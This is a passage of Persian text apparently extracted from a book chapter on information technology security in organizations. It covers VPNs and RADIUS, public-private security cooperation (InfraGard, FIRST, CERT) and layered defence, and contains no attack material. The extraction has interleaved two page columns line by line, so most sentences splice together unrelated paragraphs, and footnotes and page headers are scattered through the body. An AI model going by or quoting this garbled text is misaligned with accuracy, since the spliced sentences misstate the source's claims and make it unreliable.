ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ. ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ ،ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ-
ﻫــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺍﺳــﺖ .ﺷــﺒﻜﻪﻫــﺎﻱ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺭﺗﺒـﺎﻃﻲ ﻭﺳـﻴﻊ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )VPNﻫـﺎ( ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ،ﺍﻣـﺎ
ﺧﺼﻮﺻﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﺮ ﺩﻭ ﻣـﺎﻧﻊ ﺍﺻـﻠﻲ ﻓـﺎﺋﻖ ﺁﻳﻨـﺪ .ﺍﻭﻝ ﺑﺠﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺷﺒﻜﻪ ،ﻣﻴﺎﻥ ﺩﻭ ﺷـﺒﻜﻪ
ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺍﻳﻨﻜﻪ ﺷﺒﻜﻪﻫﺎ ﻏﺎﻟﺒﹰﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺭﺗﺒـﺎﻁ ﺷﺪ ﻭ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﺑﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ ﻣﺘـﺼﻞ
ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ VPNﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﮔﺸﺖ ،ﺑﮕﻮﻧﻪﺍﻱ ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﻛـﻪ ﮔـﻮﻳﻲ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻛﻨـﺎﺭ
IPﺍﺯ ﻳﻚ ﺷﺒﻜﻪ ﺑﻪ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ .ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺷــﺒﻜﻪ ﻭ ﻣﺘــﺼﻞ ﺑــﻪ ﺁﻥ ﺍﺳــﺖ .ﺑــﻪ ﻋﺒــﺎﺭﺕ ﺩﻳﮕــﺮ ،ﺭﻣﺰﮔــﺬﺍﺭﻱ
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ RADIUSﺗﻨﻬــﺎ ﻣﻴــﺎﻥ ﺁﻥ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩ ﻭ
ﺑﺴﺘﻪﻫﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺼﻮﺭﺕ ﻣـﺘﻦﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭ ﻧﻪ ﺩﺭ ﺗﻤﺎﻡ ﺷﺒﻜﻪ.
،Rick Fleming ۲۱۴ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﺭﺋﻴﺲ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺖ ﺷﺮﻛﺖ Digital
Defense
216 Wide Area Network 215 Dual Homed
٢١٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
217 Tunneling
۲۱۸ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ IETFﺩﺭﺣﺎﻝ ﺍﺻﻼﺡ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ VPNﺍﺳـﺖ ﺗـﺎ
IPSecﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻭ ﻧﻴﺰ ﺑﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺳﺎﺯﮔﺎﺭ ﻛﻨﺪ.
219 Point-to-Point Protocol
220 Link Layer
221 Point-to-Point Tunneling
222 Layer 2 Tunneling Protocol
۲۲۳ﻣﻘﺎﻟﺔ Karen Bannasﺑﺎ ﻋﻨﻮﺍﻥ " "Safe Passageﺩﺭ ﻣﺠﻠﺔ
،PC Magazineﻫﻔــﺖ ﺷــﺮﻛﺖ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ VPNﺭﺍ ﺑــﺮﺍﻱ
ﻣﺤﺼﻮﻻﺕ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻮﺳﻂ ﺑـﺎ ﺑﻮﺩﺟـﻪﺍﻱ
ﺣﺪﻭﺩ ﺩﻩ ﻫﺰﺍﺭ ﺩﻻﺭ ﻛﻪ ﺑﻪ VPNﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻓﺘـﺮ ﻣﺮﻛـﺰﻱ ﻭ
ﺷﻌﺒﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ:
http://www.pcmag.com/
print_article/0,3048,a%3D12352,00.asp
٢١٥ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻤﻴﺰﻱ ﻭ ﺁﺯﻣﻮﻥ ﻓﺮﺁﻳﻨﺪﻫﺎ .ﺑﺮﺍﻱ ﺗـﺴﺮﻳﻊ ﺭﻓـﻊ ﻭ ﺭﺟـﻮﻉ • ﺍﻋﺘﺒﺎﺭ ﺍﻣﻀﺎﻫﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛ •
ﻛﺎﺭﻫﺎ ﺑﺎﻳﺪ ﻫﻤﻜﺎﺭﻱ ﻭﺳﻴﻌﻲ ﻣﻴﺎﻥ ﻫﻤﺔ ﻃﺮﻓﻬﺎﻱ ﺩﺭﮔﻴـﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ،ﻭ ﺍﻋـﻼﻡ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ •
ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎﻧﻜﻬﺎﻱ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘـﺎ ﺩﺍﺭﺍﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺍﻃﻼﻋﺎﺕ؛
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻫﺎﻳﻲ ﺩﺭ Antiguaﻫــﺴﺘﻨﺪ .ﺍﮔــﺮ ﺍﻳــﻦ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣــﻦ ﭘﺮﺩﺍﺧــﺖ ﻣﻴــﺎﻥ ﺑﺎﻧﻜﻬــﺎ ﺑﺨــﺼﻮﺹ •
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ ،ﺑﺎﻧﻚ ﻫﻢ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺍﺋـﻪ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛
ﺧﺪﻣﺎﺕ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ،ﻭ ﺍﮔﺮ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺑـﺎ ﭘﻮﻟــﺸﻮﻳﻲ ﻭ ﺳــﻄﺢ ﻫﻤﻜــﺎﺭﻱ ﺑــﻴﻦ ﺍﻟﻤﻠﻠــﻲ ﻛــﻪ ﺑــﺮﺍﻱ •
ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ ،ﺍﻗﺪﺍﻣﺎﺕ ﻓﻮﺭﻳﺘﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺁﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻭ
ﺗﻌﻮﻳﻖ ﻣﻲﺍﻓﺘﺪ. ﺗﻮﺳﻌﻪ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ،ﻛﻪ ﻣﻘﻮﻟﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ •
ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺠﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ.
ﻫﻤﻜــﺎﺭﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ .ﻣﻤﻜــﻦ ﺍﺳــﺖ •
ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺟﻨﺒﺔ ﺣﻴﺜﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻣﻨﺠـﺮ ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺬﻳﺮﺵ ﺿﻮﺍﺑﻂ ﺗﻮﺳﻂ ﻋﻤﻮﻡ،
ﺑﻪ ﺧﻮﺩﺩﺍﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻥ ﺣﻮﺍﺩﺙ ﺷـﻮﻧﺪ .ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺳﺖ ﻛﺸﻴﺪﻥ ﺍﺯ ﺗﻜـﺮﻭﻱ ﻭ ﻳﻜـﻪﺗـﺎﺯﻱ ،ﻭ ﺑـﺎﻻ ﺑـﻮﺩﻥ ﺩﺍﻧـﺶ
ﺑﺮﮔﺰﺍﺭﻱ ﻣﻴﺰﮔﺮﺩﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﺤـﺚ ﭘﻴﺮﺍﻣـﻮﻥ ﺿـﻮﺍﺑﻂ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺍﺳﺖ .ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻗﺒﻞ ﻣﻴـﺎﻥ ﺻـﻨﺎﻳﻊ ﻣﺘﻔـﺎﻭﺕ ﺩﺭ
ﻗﺎﻧﻮﻧﻲ ﻭ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻫﻤﻜـﺎﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ،ﺍﻣﻨﻴـﺖ ﭘﺮﺩﺍﺧﺘﻬـﺎﻱ
ﻣﺜﺎﻟﻬــﺎﻳﻲ ﺍﺯ ﻫﻤﻜــﺎﺭﻱ ﻭ ﺷــﺮﺍﻛﺖ ﻋﻤﻠﻴــﺎﺗﻲ ﺑﺨــﺶ ﻼ ﺑـﻪ ﺗـﺪﺍﺧﻞ ﺑﺨـﺸﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﻛـﺎﻣ ﹰ
ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ ﻣﺆﺳـﺴﺔ InfraGard ﻣﺨﺎﺑﺮﺍﺕ ﻭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ .ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺷﺎﺧﺼﻬﺎﻱ
NIPCﻧﺎﻡ ﺑﺮﺩ ،ﻛـﻪ ﻣﺤـﺼﻮﻝ ﻳـﻚ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ﺭﺍ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺩﺳﺘﺮﺳﻲ ﺑـﺪﻭﻥ ﺗﺒﻌـﻴﺾ ﺑـﻪ
ﻲ ﺻﻨﻌﺖ ﻭ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺑـﻮﺩ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺳﺎﻟﻢ ﻭ ﺍﻣـﻦ" ﺗﻌﺮﻳـﻒ ﻛـﺮﺩ ،ﻭ ﺍﺯ ﻃـﺮﻑ
ﺗﻮﺳﻂ FBIﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﺷﺪ .ﺷـﻜﻞ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻧـﻮﻉ ﺩﻳﮕﺮ ﺁﺭﻣﺎﻥ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ "ﺩﺳﺘﺮﺳـﻲ ﻫﻤﮕـﺎﻧﻲ ﺑـﺮ ﺍﺳـﺎﺱ
ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﺎﻡ ٢٢٨FIRSTﻣﻴﺎﻥ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺗﻴﻤﻬـﺎﻱ ﻋﻼﻗــﻪ ﻭ ﺭﻓــﺎﻩ ﻋﻤــﻮﻣﻲ" ﺑــﻮﺩ .ﺍﻳﻨﮕﻮﻧــﻪ ﺗﻌــﺎﺭﻳﻒ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﺔ ﺑﺨـﺶ ﺩﻭﻟﺘـﻲ ،ﺍﻗﺘـﺼﺎﺩﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻲ "ﺧﺪﻣﺎﺕ ﺍﻣﻦ" ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﺷﺒﻜﻪﻫﺎ ﻭ ﺩﺭﻧﻈـﺮ
ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻫﺪﺍﻑ FIRSTﺍﻳﺠﺎﺩ ﻫﻤﺎﻫﻨﮕﻲ ﻭ ﮔﺮﻓﺘﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺑـﺼﻮﺭﺕ ﻫﻤﺰﻣـﺎﻥ ،ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ
ﻫﻤﻜﺎﺭﻱ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ،ﻭﺍﻛﻨﺶ ﺳـﺮﻳﻊ ﻣﻲﻛﻨﺪ.
ﺑﻪ ﺣﻮﺍﺩﺙ ﺍﻣﻨﻴﺘﻲ ﻭ ﺗـﺮﻭﻳﺞ ﺍﺷـﺘﺮﺍﻙ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺳﻄﻮﺡ ﻭﺳﻴﻊ ﻋﻨـﻮﺍﻥ ﺷـﺪﻩ ﺍﺳـﺖ .ﺍﺯ ﺩﻳﮕـﺮ ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ
ﻣﺜﺎﻟﻬــﺎ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﭘﻴﻤــﺎﻥ ﺍﻣﻨﻴ ـﺖ ﺑﺎ ﻭﺟﻮﺩ ﻣﺸﻜﻼﺕ ﻓﺮﺍﻭﺍﻥ ﭘـﺮﺩﺍﺧﺘﻦ ﺑـﻪ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺩﻭﮔﺎﻧـﺔ
ﺍﻳﻨﺘﺮﻧﺖ ٢٢٩ﻭ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ )(CERT ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ،ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﻚ ﻧﻴـﺎﺯ ﺣﻴـﺎﺗﻲ ﺑـﺮﺍﻱ
ﺍﺷﺎﺭﻩ ﻛﺮﺩ ،ﻛﻪ ﻣﺤﺼﻮﻝ ﻳﻚ ﻫﻤﻜﺎﺭﻱ ﻣـﺸﺘﺮﻙ ﻣﻴـﺎﻥ ﺑﻴﺸﺘﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻋﻤﻠـﻲ،
ﻲ CERTﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ Carnegie ﻣﺮﻛﺰ ﺑـﻴﻦﺍﻟﻤﻠﻠـ ﹺ ﻗــﺎﻧﻮﻧﻲ ﻭ ﺣﻴﺜﻴﺘــﻲ ﺩﺭ ﻣﺤــﻴﻂ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ،ﺗــﻼﺵ ﻭ
Mellonﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻏﻴﺮﺩﻭﻟﺘـﻲ ﻫﻤﺎﻫﻨﮕﻲ ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ .ﻃﺮﺣﻬﺎﻳﻲ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ
ﺍﺳﺖ. ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ:
ﺍﻣﻨﻴــﺖ ﭼﻨﺪﻻﻳــﻪ .ﻣﻬﻤﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ •
ﺁﻣﻮﺯﺵ ،ﺁﮔـﺎﻫﻲ ﻭ ﻳـﺎﺩﮔﻴﺮﻱ ﻣﻬـﺎﺭﺕ .ﺗﺤﻘﻴـﻖ ﺑﺎﻧـﻚ •
ﺍﻃﻼﻋﺎﺕ ،ﺷﻴﻮﺓ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻳﻤﻨـﻲ ﺗﻨﻬـﺎ ﺟﻬﺎﻧﻲ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺣﺪﻭﺩ %۵۰ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﺗﻮﺳﻂ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻣﻴﻦ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺍﻓـﺮﺍﺩ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻧﺎﺷﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﺍﺟﺮﺍﻱ ﻧﺎﺩﺭﺳـﺖ
ﻧﻴﺰ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﻋﻤﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ .ﺍﻋﺘﻤﺎﺩ ﺑﻴﺶ ﺍﺯ ﺣـﺪ ﺑـﻪ ﻲ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻴـﺰ
ﻳﺎ ﻧﺎﺗﻮﺍﻧﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘ ﹺ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺷﻤﻨﺪﻱ ﭼﻮﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻟﺰﻭﻣﹰﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻴﺎﻓﺰﺍﻳﻴﻢ ،ﺍﻳﻦ ﺩﺭﺻﺪ ﺑﺎﺯ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ
ﻳﺎﻓﺖ.
228 Forum of Incident Response and Security
Teams
)229 Internet Security Alliance (www.isalliance.org
٢١٧ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻫﻮﺷﻤﻨﺪ( .ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺯ ﻫـﺮ ﺭﻣـﺰ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻤﻜـﻦ ﺣﻔﺎﻇـﺖ ﻧﻤـﻲﻛﻨـﺪ.
ﻋﺒﻮﺭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻜﺒﺎﺭ ﻣﻲﺗﻮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ. ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ﻭ
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺑـﺎ ﻣﻌﻤـﺎﺭﻱ ﺑـﺎﺯ ﺗﻌﺮﻳـﻒ
ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ )ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺯﻧﺠﻴﺮ ﺍﻣﻨﻴﺘـﻲ( ﺭﺍ ﺍﻓـﺰﺍﻳﺶ .۴
ﺷﺪﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭﺍﻗﻌﻲ ﻫﺮ ﻻﻳﻪ،
ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻭﺷـﻬﺎ ﻭ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﺮﺍﻱ
ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﺪﺍﺭﺩ .ﺍﻳـﻦ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪ
ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺩﺭ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨـﺶ ﻛﺘـﺎﺏ ﺗﻮﺿـﻴﺢ ﺩﺍﺩﻩ
ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻦ ﺑﺎﺷﻨﺪ ،ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺷﺎﻣﻞ ﻧﺼﺐ ﺩﻳﻮﺍﺭﻩﻫـﺎﻱ
ﺷﺪﻩﺍﻧﺪ.
ﺁﺗﺶ ﺷﺨﺼﻲ ٢٣٠ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ
ﻧﻴﺰ ﻣﻲﺷﻮﺩ.
ﻧﻘﺶ ﻛﺸﻮﺭﻫﺎ
ﺭﻭﻳﺪﺍﺩﻫﺎ ﺑﺎﻳﺪ ﻣﺪﻳﺮﻳﺖ ﺷﺪﻩ ﻭ ﺑﺴﺮﻋﺖ ﮔﺰﺍﺭﺵ ﺷﻮﻧﺪ ﺗـﺎ .۵
ﻧﺴﺒﺖ ﺑﻪ ﻭﺍﻛﻨﺶ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﺗـﻴﻢ ﺍﻣﻨﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ ﻫﻨﮓﻛﻨﮓ
ﺣﺎﺻﻞ ﺷﻮﺩ.
ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺍﺩﺍﺭﺓ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ﻫﻨﮓﻛﻨﮓ ﺑـﺎ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﺳـﻪ
ﺩﺭ ﻫﻨﮓﻛﻨﮓ ،ﺩﻭﻟﺖ ﺑﺎ ﺑﺎﻧﻜﻬﺎ ﻭ ﭘﻠﻴﺲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺭﻭﻳـﺪﺍﺩﻫﺎ ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ:
ﻭ ﺧﻄﺮﺍﺕ ﻫﻤﻜﺎﺭﻱ ﻣﻲ ﻛﻨﺪ ﻭ ﺑـﺎ ﺍﻋﻤـﺎﻝ ﻣـﺪﻳﺮﻳﺖ ﺍﺛـﺮﺑﺨﺶ،
ﺑﺨﺶ ﺳﻮﻡ
